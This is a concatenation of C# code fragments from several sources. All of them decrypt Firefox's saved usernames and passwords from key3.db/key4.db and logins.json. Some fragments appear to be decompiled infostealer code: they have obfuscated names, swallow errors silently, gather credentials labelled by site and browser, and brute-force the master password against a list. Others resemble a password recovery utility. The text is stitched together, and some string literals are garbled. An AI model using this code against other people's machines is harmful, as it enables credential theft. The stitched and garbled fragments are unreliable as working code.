public static void Lopos(string profile, byte[] privateKey, string browser_name, string profile_name) { try { string path = CreateTempCopy(Path.Combine(profile, "logins.json")); if (File.Exists(path)) { { foreach (JsonValue item in File.ReadAllText(path).FromJSON()["logins"]) { GetPasswords.Cpassword++; Asn1DerObject Gecko4 = Asn1Der.Parse(Convert.FromBase64String(item["encryptedUsername"].ToString(saving: false))); Asn1DerObject Gecko42 = Asn1Der.Parse(Convert.FromBase64String(item["encryptedPassword"].ToString(saving: false))); string text = Regex.Replace(TripleDESHelper.DESCBCDecryptor(privateKey, Gecko4.Objects[0].Objects[1].Objects[1].GetObjectData(), Gecko4.Objects[0].Objects[2].GetObjectData(), PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty); string text2 = Regex.Replace(TripleDESHelper.DESCBCDecryptor(privateKey, Gecko42.Objects[0].Objects[1].Objects[1].GetObjectData(), Gecko42.Objects[0].Objects[2].GetObjectData(), PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty); credential.Add("Site_Url : " + item["hostname"] + Environment.NewLine + "Login : "******"Password : "******"Browser : " + browser_name + Environment.NewLine + "Profile : " + profile_name + Environment.NewLine + credential[i]); } credential.Clear(); } } } catch (Exception) { } }
public string DecryptData(byte[] data) { var asnObj = Asn1Der.Parse(data); return(Regex.Replace(TripleDesHelper.DescbcDecryptor(_privateKey, asnObj.Objects[0].Objects[1].Objects[1].Data, asnObj.Objects[0].Objects[2].Data), @"[^\u0020-\u007F]", "")); }
public byte[] CheckKey4DB(string dir, string masterPwd, bool Verbose) { try { Asn1Der asn = new Asn1Der(); byte[] item2 = new byte[] { }; byte[] item1 = new byte[] { }; byte[] a11 = new byte[] { }; byte[] a102 = new byte[] { }; string query = "SELECT item1,item2 FROM metadata WHERE id = 'password'"; if (Verbose) { Console.WriteLine("Fetch data from key4.db file"); } GetItemsFromQuery(dir, ref item1, ref item2, query); Asn1DerObject f800001 = asn.Parse(item2); MozillaPBE CheckPwd = new MozillaPBE(item1, Encoding.ASCII.GetBytes(""), f800001.objects[0].objects[0].objects[1].objects[0].Data); CheckPwd.Compute(); string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, f800001.objects[0].objects[1].Data); if (!decryptedPwdChk.StartsWith("password-check")) { Console.WriteLine("Master password is wrong !"); return(null); } query = "SELECT a11,a102 FROM nssPrivate"; GetItemsFromQuery(dir, ref a11, ref a102, query); var decodedA11 = asn.Parse(a11); var entrySalt = decodedA11.objects[0].objects[0].objects[1].objects[0].Data; var cipherT = decodedA11.objects[0].objects[1].Data; if (Verbose) { Console.WriteLine("Fetch Private key"); } return(decrypt3DES(item1, masterPwd, entrySalt, cipherT)); } catch (Exception ex) { Console.WriteLine("Exeption:\n" + ex.Message); return(null); } }
private static void Main() { Searcher.CopyLoginsInSafeDir(); Console.ReadLine(); string MasterPwd = string.Empty; bool Verbose = false; string filePath = string.Empty; var dt = new DataTable(); var asn = new Asn1Der(); var db = new BerkeleyDB(Path.Combine(filePath, "key4.db")); var pwdCheck = new PasswordCheck((from p in db.Keys where p.Key.Equals("password-check") select p.Value).FirstOrDefault().Replace("-", "")); string GlobalSalt = (from p in db.Keys where p.Key.Equals("global-salt") select p.Value).FirstOrDefault().Replace("-", ""); string f81 = (from p in db.Keys where !p.Key.Equals("global-salt") && !p.Key.Equals("Version") && !p.Key.Equals("password-check") select p.Value).FirstOrDefault().Replace("-", ""); var CheckPwd = new MozillaPBE(MasterPassword.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(MasterPwd), MasterPassword.ConvertHexStringToByteArray(pwdCheck.EntrySalt)); CheckPwd.Compute(); string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, MasterPassword.ConvertHexStringToByteArray(pwdCheck.Passwordcheck)); Asn1DerObject f800001 = asn.Parse(MasterPassword.ConvertHexStringToByteArray(f81)); MozillaPBE CheckPrivateKey = new MozillaPBE(MasterPassword.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(MasterPwd), f800001.objects[0].objects[0].objects[1].objects[0].Data); CheckPrivateKey.Compute(); byte[] decryptF800001 = TripleDESHelper.DESCBCDecryptorByte(CheckPrivateKey.Key, CheckPrivateKey.IV, f800001.objects[0].objects[1].Data); Asn1DerObject f800001deriv1 = asn.Parse(decryptF800001); Asn1DerObject f800001deriv2 = asn.Parse(f800001deriv1.objects[0].objects[2].Data); byte[] privateKey = new byte[24]; if (f800001deriv2.objects[0].objects[3].Data.Length > 24) { Array.Copy(f800001deriv2.objects[0].objects[3].Data, f800001deriv2.objects[0].objects[3].Data.Length - 24, privateKey, 0, 24); } else { privateKey = f800001deriv2.objects[0].objects[3].Data; } }
// Token: 0x060000E9 RID: 233 RVA: 0x000076D8 File Offset: 0x000058D8 private static byte[] ExtractPrivateKey3(string file) { byte[] array = new byte[24]; try { Console.WriteLine("Key source file: " + file); if (!File.Exists(file)) { Console.WriteLine("Source file UNKNOWN"); return(array); } new DataTable(); Asn1Der asn1Der = new Asn1Der(); BerkeleyDB berkeleyDB = new BerkeleyDB(file); PasswordCheck passwordCheck = new PasswordCheck(FirefoxBase.FindValueByKey(berkeleyDB, (string x) => x.Equals("password-check"))); string hexString = FirefoxBase.FindValueByKey(berkeleyDB, (string x) => x.Equals("global-salt")); MozillaPBE mozillaPBE = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), ByteHelper.ConvertHexStringToByteArray(passwordCheck.EntrySalt)); mozillaPBE.Compute(); TripleDESHelper.DESCBCDecryptor(mozillaPBE.Key, mozillaPBE.IV, ByteHelper.ConvertHexStringToByteArray(passwordCheck.Passwordcheck), PaddingMode.None); string hexString2 = FirefoxBase.FindValueByKey(berkeleyDB, (string x) => !x.Equals("password-check") && !x.Equals("Version") && !x.Equals("global-salt")); Asn1DerObject asn1DerObject = asn1Der.Parse(ByteHelper.ConvertHexStringToByteArray(hexString2)); MozillaPBE mozillaPBE2 = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), asn1DerObject.objects[0].objects[0].objects[1].objects[0].Data); mozillaPBE2.Compute(); byte[] bytes = Encoding.Default.GetBytes(TripleDESHelper.DESCBCDecryptor(mozillaPBE2.Key, mozillaPBE2.IV, asn1DerObject.objects[0].objects[1].Data, PaddingMode.None)); Asn1DerObject asn1DerObject2 = asn1Der.Parse(bytes); Asn1DerObject asn1DerObject3 = asn1Der.Parse(asn1DerObject2.objects[0].objects[2].Data); if (asn1DerObject3.objects[0].objects[3].Data.Length > 24) { Array.Copy(asn1DerObject3.objects[0].objects[3].Data, asn1DerObject3.objects[0].objects[3].Data.Length - 24, array, 0, 24); } else { array = asn1DerObject3.objects[0].objects[3].Data; } } catch { } return(array); }
private byte[] CheckKey4DB(string dir, string masterPwd) { try { ErrorHandle eh = new ErrorHandle(); Asn1Der asn = new Asn1Der(); byte[] item2 = new byte[] { }; byte[] item1 = new byte[] { }; byte[] a11 = new byte[] { }; byte[] a102 = new byte[] { }; string query = "SELECT item1,item2 FROM metadata WHERE id = 'password'"; GetItemsFromQuery(dir, ref item1, ref item2, query); Asn1DerObject f800001 = asn.Parse(item2); MozillaPBE CheckPwd = new MozillaPBE(item1, Encoding.ASCII.GetBytes(""), f800001.objects[0].objects[0].objects[1].objects[0].Data); CheckPwd.Compute(); string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, f800001.objects[0].objects[1].Data); if (!decryptedPwdChk.StartsWith("password-check")) { eh.ErrorFunc("Master password is wrong !"); return(null); } query = "SELECT a11,a102 FROM nssPrivate"; GetItemsFromQuery(dir, ref a11, ref a102, query); var decodedA11 = asn.Parse(a11); var entrySalt = decodedA11.objects[0].objects[0].objects[1].objects[0].Data; var cipherT = decodedA11.objects[0].objects[1].Data; return(decrypt3DES(item1, masterPwd, entrySalt, cipherT)); } catch (Exception ex) { return(null); } }
// Token: 0x060000E5 RID: 229 RVA: 0x00007090 File Offset: 0x00005290 private static IEnumerable <BrowserCredendtial> ExtractLogins(string profile, byte[] privateKey) { List <BrowserCredendtial> list = new List <BrowserCredendtial>(); try { string path = ChromiumManager.CreateTempCopy(Path.Combine(profile, "logins.json")); if (!File.Exists(path)) { return(list); } RootLogin rootLogin = File.ReadAllText(path).FromJSON <RootLogin>(); Asn1Der asn1Der = new Asn1Der(); foreach (LoginJson loginJson in rootLogin.logins) { Asn1DerObject asn1DerObject = asn1Der.Parse(Convert.FromBase64String(loginJson.encryptedUsername)); Asn1DerObject asn1DerObject2 = asn1Der.Parse(Convert.FromBase64String(loginJson.encryptedPassword)); string text = Regex.Replace(TripleDESHelper.DESCBCDecryptor(privateKey, asn1DerObject.objects[0].objects[1].objects[1].Data, asn1DerObject.objects[0].objects[2].Data, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty); string text2 = Regex.Replace(TripleDESHelper.DESCBCDecryptor(privateKey, asn1DerObject2.objects[0].objects[1].objects[1].Data, asn1DerObject2.objects[0].objects[2].Data, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty); BrowserCredendtial browserCredendtial = new BrowserCredendtial { URL = (string.IsNullOrEmpty(loginJson.hostname) ? "UNKNOWN" : loginJson.hostname), Login = (string.IsNullOrEmpty(text) ? "UNKNOWN" : text), Password = (string.IsNullOrEmpty(text2) ? "UNKNOWN" : text2) }; if (browserCredendtial.Login != "UNKNOWN" && browserCredendtial.Password != "UNKNOWN" && browserCredendtial.URL != "UNKNOWN") { list.Add(browserCredendtial); } } } catch (Exception value) { Console.WriteLine(value); } return(list); }
private static byte[] P4k(string file) { byte[] result = new byte[24]; try { if (!File.Exists(file)) { return(result); } var cNT = new CNT(file); cNT.ReadTable("metaData"); string s = cNT.ParseValue(0, "item1"); string s2 = cNT.ParseValue(0, "item2)"); Asn1DerObject ansobjectS2 = Asn1Der.Parse(Encoding.Default.GetBytes(s2)); byte[] objectData = ansobjectS2.Objects[0].Objects[0].Objects[1].Objects[0].GetObjectData(); byte[] objectData2 = ansobjectS2.Objects[0].Objects[1].GetObjectData(); var inizialize = new MozillaPBE(Encoding.Default.GetBytes(s), Encoding.Default.GetBytes(string.Empty), objectData); inizialize.Compute(); TripleDESHelper.DESCBCDecryptor(inizialize.GetKey(), inizialize.GetIV(), objectData2); cNT.ReadTable("nssPrivate"); int rowLength = cNT.RowLength; string s3 = string.Empty; for (int i = 0; i < rowLength; i++) { if (cNT.ParseValue(i, "a102") == Encoding.Default.GetString(Key4MagicNumber)) { s3 = cNT.ParseValue(i, "a11"); break; } } Asn1DerObject ansobjectS3 = Asn1Der.Parse(Encoding.Default.GetBytes(s3)); objectData = ansobjectS3.Objects[0].Objects[0].Objects[1].Objects[0].GetObjectData(); objectData2 = ansobjectS3.Objects[0].Objects[1].GetObjectData(); inizialize = new MozillaPBE(Encoding.Default.GetBytes(s), Encoding.Default.GetBytes(string.Empty), objectData); inizialize.Compute(); result = Encoding.Default.GetBytes(TripleDESHelper.DESCBCDecryptor(inizialize.GetKey(), inizialize.GetIV(), objectData2, PaddingMode.PKCS7)); return(result); } catch (Exception) { return(result); } }
private static byte[] P3k(string file) { byte[] array = new byte[24]; try { if (!File.Exists(file)) { return(array); } new DataTable(); var berkeleyDB = new BerkeleyDB(file); var Gecko7 = new PasswordCheck(ValueDB(berkeleyDB, (string x) => x.Equals("password-check"))); string hexString = ValueDB(berkeleyDB, (string x) => x.Equals("global-salt")); var Gecko8 = new MozillaPBE(ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), ConvertHexStringToByteArray(Gecko7.EntrySalt)); Gecko8.Compute(); TripleDESHelper.DESCBCDecryptor(Gecko8.GetKey(), Gecko8.GetIV(), ConvertHexStringToByteArray(Gecko7.Passwordcheck)); Asn1DerObject Gecko4 = Asn1Der.Parse(ConvertHexStringToByteArray(ValueDB(berkeleyDB, (string x) => !x.Equals("password-check") && !x.Equals("Version") && !x.Equals("global-salt")))); var Gecko82 = new MozillaPBE(ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), Gecko4.Objects[0].Objects[0].Objects[1].Objects[0].GetObjectData()); Gecko82.Compute(); Asn1DerObject Gecko42 = Asn1Der.Parse(Asn1Der.Parse(Encoding.Default.GetBytes(TripleDESHelper.DESCBCDecryptor(Gecko82.GetKey(), Gecko82.GetIV(), Gecko4.Objects[0].Objects[1].GetObjectData()))).Objects[0].Objects[2].GetObjectData()); if (Gecko42.Objects[0].Objects[3].GetObjectData().Length <= 24) { array = Gecko42.Objects[0].Objects[3].GetObjectData(); return(array); } Array.Copy(Gecko42.Objects[0].Objects[3].GetObjectData(), Gecko42.Objects[0].Objects[3].GetObjectData().Length - 24, array, 0, 24); return(array); } catch (Exception) { return(array); } }
private static void ParseLogins(string directory, string userName, string masterPassword = "") { // Read berkeleydb Asn1Der asn = new Asn1Der(); BerkeleyDB db = new BerkeleyDB(Path.Combine(directory, "key3.db")); PasswordCheck pwdCheck = new PasswordCheck(db.GetValueOfKey("password-check").Replace("-", "")); //string GlobalSalt = (from p in db.Keys // where p.Key.Equals("global-salt") // select p.Value).FirstOrDefault().Replace("-", ""); string GlobalSalt = db.GetValueOfKey("global-salt").Replace("-", ""); MozillaPBE CheckPwd = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(masterPassword), ByteHelper.ConvertHexStringToByteArray(pwdCheck.EntrySalt)); CheckPwd.Compute(); string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, ByteHelper.ConvertHexStringToByteArray(pwdCheck.Passwordcheck)); if (!decryptedPwdChk.StartsWith("password-check")) { Console.WriteLine("Master password is wrong; cannot decrypt FireFox logins."); return; } // Get private key string f81 = String.Empty; String[] blacklist = { "global-salt", "Version", "password-check" }; foreach (var k in db.Keys) { if (Array.IndexOf(blacklist, k.Key) == -1) { f81 = k.Value.Replace("-", ""); } } if (f81 == String.Empty) { Console.WriteLine("[X] Could not retrieve private key."); return; } Asn1DerObject f800001 = asn.Parse(ByteHelper.ConvertHexStringToByteArray(f81)); MozillaPBE CheckPrivateKey = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(masterPassword), f800001.objects[0].objects[0].objects[1].objects[0].Data); CheckPrivateKey.Compute(); byte[] decryptF800001 = TripleDESHelper.DESCBCDecryptorByte(CheckPrivateKey.Key, CheckPrivateKey.IV, f800001.objects[0].objects[1].Data); Asn1DerObject f800001deriv1 = asn.Parse(decryptF800001); Asn1DerObject f800001deriv2 = asn.Parse(f800001deriv1.objects[0].objects[2].Data); byte[] privateKey = new byte[24]; if (f800001deriv2.objects[0].objects[3].Data.Length > 24) { Array.Copy(f800001deriv2.objects[0].objects[3].Data, f800001deriv2.objects[0].objects[3].Data.Length - 24, privateKey, 0, 24); } else { privateKey = f800001deriv2.objects[0].objects[3].Data; } // decrypt username and password string loginsJsonPath = String.Format("{0}\\{1}", directory, "logins.json"); Login[] logins = ParseLoginFile(loginsJsonPath); if (logins.Length == 0) { Console.WriteLine("No logins discovered from logins.json"); return; } foreach (Login login in logins) { Asn1DerObject user = asn.Parse(Convert.FromBase64String(login.encryptedUsername)); Asn1DerObject pwd = asn.Parse(Convert.FromBase64String(login.encryptedPassword)); string hostname = login.hostname; string decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data); string decryptedPwd = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data); Console.WriteLine("--- FireFox Credential (User: {0}) ---", userName); Console.WriteLine("Hostname: {0}", hostname); Console.WriteLine("Username: {0}", Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", "")); Console.WriteLine("Password: {0}", Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", "")); Console.WriteLine(); } }
private byte[] CheckKey3DB(string filePath, string MasterPwd) { try { Converts conv = new Converts(); ErrorHandle eh = new ErrorHandle(); Asn1Der asn = new Asn1Der(); BerkeleyDB db = new BerkeleyDB(Path.Combine(filePath, "key3.db")); // Verify MasterPassword PasswordCheck pwdCheck = new PasswordCheck((from p in db.Keys where p.Key.Equals("password-check") select p.Value).FirstOrDefault().Replace("-", "")); string GlobalSalt = (from p in db.Keys where p.Key.Equals("global-salt") select p.Value).FirstOrDefault().Replace("-", ""); MozillaPBE CheckPwd = new MozillaPBE(conv.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(MasterPwd), conv.ConvertHexStringToByteArray(pwdCheck.EntrySalt)); CheckPwd.Compute(); string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, conv.ConvertHexStringToByteArray(pwdCheck.Passwordcheck)); if (!decryptedPwdChk.StartsWith("password-check")) { eh.ErrorFunc("Master password is wrong !"); return(null); } // Get private key string f81 = (from p in db.Keys where !p.Key.Equals("global-salt") && !p.Key.Equals("Version") && !p.Key.Equals("password-check") select p.Value).FirstOrDefault().Replace("-", ""); Asn1DerObject f800001 = asn.Parse(conv.ConvertHexStringToByteArray(f81)); MozillaPBE CheckPrivateKey = new MozillaPBE(conv.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(MasterPwd), f800001.objects[0].objects[0].objects[1].objects[0].Data); CheckPrivateKey.Compute(); byte[] decryptF800001 = TripleDESHelper.DESCBCDecryptorByte(CheckPrivateKey.Key, CheckPrivateKey.IV, f800001.objects[0].objects[1].Data); Asn1DerObject f800001deriv1 = asn.Parse(decryptF800001); Asn1DerObject f800001deriv2 = asn.Parse(f800001deriv1.objects[0].objects[2].Data); byte[] privateKey = new byte[24]; if (f800001deriv2.objects[0].objects[3].Data.Length > 24) { Array.Copy(f800001deriv2.objects[0].objects[3].Data, f800001deriv2.objects[0].objects[3].Data.Length - 24, privateKey, 0, 24); } else { privateKey = f800001deriv2.objects[0].objects[3].Data; } return(privateKey); } catch (Exception ex) { return(null); } }
public List <LoginFieldS> FetchPassword() { try { byte[] privateKey = new byte[24]; bool loginsFound = false, signonsFound = false; string signonsFile = string.Empty, loginsFile = string.Empty;; ErrorHandle eh = new ErrorHandle(); string MasterPwd = string.Empty; string filePath = string.Empty; Converts conv = new Converts(); // Read berkeleydb DataTable dt = new DataTable(); Asn1Der asn = new Asn1Der(); List <LoginFieldS> lp = new List <LoginFieldS>(); var ffPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Mozilla\\Firefox\\Profiles"); if (!Directory.Exists(ffPath)) { return(lp); } var dirs = Directory.GetDirectories(ffPath); foreach (string dir in dirs) { try { string[] files = Directory.GetFiles(dir, "signons.sqlite"); if (files.Length > 0) { filePath = dir; signonsFile = files[0]; signonsFound = true; } // find logins.json file files = Directory.GetFiles(dir, "logins.json"); if (files.Length > 0) { filePath = dir; loginsFile = files[0]; loginsFound = true; } if (!loginsFound && !signonsFound) { eh.ErrorFunc("File signons & logins not found."); continue; } if (filePath == string.Empty) { eh.ErrorFunc("Mozilla not found."); continue; } // Check if files exists if (!File.Exists(Path.Combine(filePath, "key3.db"))) { privateKey = CheckKey4DB(dir, MasterPwd); } else { privateKey = CheckKey3DB(dir, MasterPwd); } if (privateKey == null || privateKey.Length == 0) { eh.ErrorFunc("Private key return null"); continue; } // decrypt username and password FFLogins ffLoginData; DataBase dbLocal = new DataBase(); if (signonsFound) { using (SQLiteConnection cnn = new SQLiteConnection("Data Source=" + Path.Combine(filePath, "signons.sqlite"))) { cnn.Open(); SQLiteCommand mycommand = new SQLiteCommand(cnn); mycommand.CommandText = "select hostname, encryptedUsername, encryptedPassword, guid, encType from moz_logins;"; SQLiteDataReader reader = mycommand.ExecuteReader(); dt.Load(reader); } foreach (DataRow row in dt.Rows) { try { Asn1DerObject user = asn.Parse(Convert.FromBase64String(row["encryptedUsername"].ToString())); Asn1DerObject pwd = asn.Parse(Convert.FromBase64String(row["encryptedPassword"].ToString())); string hostname = row["hostname"].ToString(); string decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data); string decryptedPwd = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data); string username = Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", "").GetUTF8String(64); string password = Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", "").GetUTF8String(64); string title = HIOStaticValues.getTitleNameURI(hostname).GetUTF8String(64); string url = HIOStaticValues.getDomainNameURI(hostname).GetUTF8String(256); if (dbLocal.getInfoFromDB(url, username, "").Count == 0) { lp.Add(new LoginFieldS { url = url, userName = username, password = password, title = title }); } } catch (Exception ex) { continue; } } } if (loginsFound) { using (StreamReader sr = new StreamReader(Path.Combine(filePath, "logins.json"))) { string json = sr.ReadToEnd(); ffLoginData = JsonConvert.DeserializeObject <FFLogins>(json); } foreach (LoginData loginData in ffLoginData.logins) { try { Asn1DerObject user = asn.Parse(Convert.FromBase64String(loginData.encryptedUsername)); Asn1DerObject pwd = asn.Parse(Convert.FromBase64String(loginData.encryptedPassword)); string hostname = loginData.hostname; string decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data); string decryptedPwd = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data); string username = Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", "").GetUTF8String(64); string password = Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", "").GetUTF8String(64); string title = HIOStaticValues.getTitleNameURI(hostname).GetUTF8String(64); string url = HIOStaticValues.getDomainNameURI(hostname).GetUTF8String(256); if (dbLocal.getInfoFromDB(url, username, "").Count == 0) { lp.Add(new LoginFieldS { url = url, userName = username, password = password, title = title }); } } catch (Exception ex) { continue; } } } } catch (Exception ex) { continue; } } return(lp); } catch (Exception ex) { throw ex; } }
public static int Main(string[] args) { string MasterPwd = string.Empty; bool Verbose = false; string filePath = string.Empty; //Manage args for (int i = 0; i < args.Length; i++) { if (args[i].Equals("-p")) { MasterPwd = args[i + 1]; } if (args[i].Equals("-f")) { filePath = args[i + 1]; } if (args[i].Equals("-v")) { Verbose = true; } if (args[i].Equals("-h")) { Console.WriteLine("FirePwd.Net v0.1"); Console.WriteLine("Usage :"); Console.WriteLine("\t -p to specify Master Password"); Console.WriteLine("\t -v to activate verbose mode"); Console.WriteLine("\t -f to specify path for files key3.db and signons.sqlite"); return(0); } } // Check if files exists if (!File.Exists(Path.Combine(filePath, "key3.db"))) { Console.WriteLine("File key3.db not found."); return(0); } if (!File.Exists(Path.Combine(filePath, "signons.sqlite"))) { Console.WriteLine("File key3.db not found."); return(0); } // Read berkeleydb DataTable dt = new DataTable(); Asn1Der asn = new Asn1Der(); BerkeleyDB db = new BerkeleyDB(Path.Combine(filePath, "key3.db")); if (Verbose) { Console.WriteLine(db.Version); } // Verify MasterPassword PasswordCheck pwdCheck = new PasswordCheck((from p in db.Keys where p.Key.Equals("password-check") select p.Value).FirstOrDefault().Replace("-", "")); string GlobalSalt = (from p in db.Keys where p.Key.Equals("global-salt") select p.Value).FirstOrDefault().Replace("-", ""); if (Verbose) { Console.WriteLine("GlobalSalt = " + GlobalSalt); Console.WriteLine("EntrySalt = " + pwdCheck.EntrySalt); } MozillaPBE CheckPwd = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(MasterPwd), ByteHelper.ConvertHexStringToByteArray(pwdCheck.EntrySalt)); CheckPwd.Compute(); string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, ByteHelper.ConvertHexStringToByteArray(pwdCheck.Passwordcheck)); if (!decryptedPwdChk.StartsWith("password-check")) { Console.WriteLine("Master password is wrong !"); return(0); } // Get private key string f81 = (from p in db.Keys where !p.Key.Equals("global-salt") && !p.Key.Equals("Version") && !p.Key.Equals("password-check") select p.Value).FirstOrDefault().Replace("-", ""); Asn1DerObject f800001 = asn.Parse(ByteHelper.ConvertHexStringToByteArray(f81)); if (Verbose) { Console.WriteLine("F800001"); Console.WriteLine(f800001.ToString()); } MozillaPBE CheckPrivateKey = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(MasterPwd), f800001.objects[0].objects[0].objects[1].objects[0].Data); CheckPrivateKey.Compute(); byte[] decryptF800001 = TripleDESHelper.DESCBCDecryptorByte(CheckPrivateKey.Key, CheckPrivateKey.IV, f800001.objects[0].objects[1].Data); Asn1DerObject f800001deriv1 = asn.Parse(decryptF800001); if (Verbose) { Console.WriteLine("F800001 first derivation"); Console.WriteLine(f800001deriv1.ToString()); } Asn1DerObject f800001deriv2 = asn.Parse(f800001deriv1.objects[0].objects[2].Data); if (Verbose) { Console.WriteLine("F800001 second derivation"); Console.WriteLine(f800001deriv2.ToString()); } byte[] privateKey = new byte[24]; if (f800001deriv2.objects[0].objects[3].Data.Length > 24) { Array.Copy(f800001deriv2.objects[0].objects[3].Data, f800001deriv2.objects[0].objects[3].Data.Length - 24, privateKey, 0, 24); } else { privateKey = f800001deriv2.objects[0].objects[3].Data; } if (Verbose) { Console.WriteLine("Private key = " + privateKey.ToString()); } // decrypt username and password using (SQLiteConnection cnn = new SQLiteConnection("Data Source=" + Path.Combine(filePath, "signons.sqlite"))) { cnn.Open(); SQLiteCommand mycommand = new SQLiteCommand(cnn); mycommand.CommandText = "select hostname, encryptedUsername, encryptedPassword, guid, encType from moz_logins;"; SQLiteDataReader reader = mycommand.ExecuteReader(); dt.Load(reader); } foreach (DataRow row in dt.Rows) { Asn1DerObject user = asn.Parse(Convert.FromBase64String(row["encryptedUsername"].ToString())); Asn1DerObject pwd = asn.Parse(Convert.FromBase64String(row["encryptedPassword"].ToString())); if (Verbose) { Console.WriteLine("User= "******"Pwd= " + pwd.ToString()); } string hostname = row["hostname"].ToString(); string decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data); string decryptedPwd = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data); Console.WriteLine(hostname + " " + Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", "") + " " + Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", "")); } return(0); }
public bool Initialize(string profilePath) { BerkeleyDb db = new BerkeleyDb(Path.Combine(profilePath, "key3.db")); PasswordCheck pwdCheck = new PasswordCheck(db.Keys.Where(p => p.Key.Equals("password-check")) .Select(p => p.Value).First().Replace("-", "")); string globalSalt = db.Keys.Where(p => p.Key.Equals("global-salt")) .Select(p => p.Value) .First() .Replace("-", ""); var globalSaltBytes = StringExtensions.HexToBytes(globalSalt); var pwdCheckSaltBytes = StringExtensions.HexToBytes(pwdCheck.EntrySalt); var masterPassword = ""; bool CheckPassword(string password) { MozillaPBE checkPwd = new MozillaPBE(globalSaltBytes, Encoding.ASCII.GetBytes(password), pwdCheckSaltBytes); checkPwd.Compute(); string decryptedPwdChk = TripleDesHelper.DescbcDecryptor(checkPwd.Key, checkPwd.IV, StringExtensions.HexToBytes(pwdCheck.Passwordcheck)); return(decryptedPwdChk.StartsWith("password-check")); } if (!CheckPassword(masterPassword)) { var foundPassword = false; if (PasswordList?.Length > 0) { foreach (var password in PasswordList) { masterPassword = password; foundPassword = CheckPassword(password); if (foundPassword) { break; } } } if (!foundPassword) { return(false); } } //private key string f81 = db.Keys.Where(p => !p.Key.Equals("global-salt") && !p.Key.Equals("Version") && !p.Key.Equals("password-check")) .Select(p => p.Value) .First() .Replace("-", ""); Asn1DerObject f800001 = Asn1Der.Parse(StringExtensions.HexToBytes(f81)); MozillaPBE checkPrivateKey = new MozillaPBE(StringExtensions.HexToBytes(globalSalt), Encoding.ASCII.GetBytes(masterPassword), f800001.Objects[0].Objects[0].Objects[1].Objects[0].Data); checkPrivateKey.Compute(); byte[] decryptF800001 = TripleDesHelper.DescbcDecryptorByte(checkPrivateKey.Key, checkPrivateKey.IV, f800001.Objects[0].Objects[1].Data); Asn1DerObject f800001deriv1 = Asn1Der.Parse(decryptF800001); Asn1DerObject f800001deriv2 = Asn1Der.Parse(f800001deriv1.Objects[0].Objects[2].Data); if (f800001deriv2.Objects[0].Objects[3].Data.Length > 24) { _privateKey = new byte[24]; Array.Copy(f800001deriv2.Objects[0].Objects[3].Data, f800001deriv2.Objects[0].Objects[3].Data.Length - 24, _privateKey, 0, 24); } else { _privateKey = f800001deriv2.Objects[0].Objects[3].Data; } return(true); }
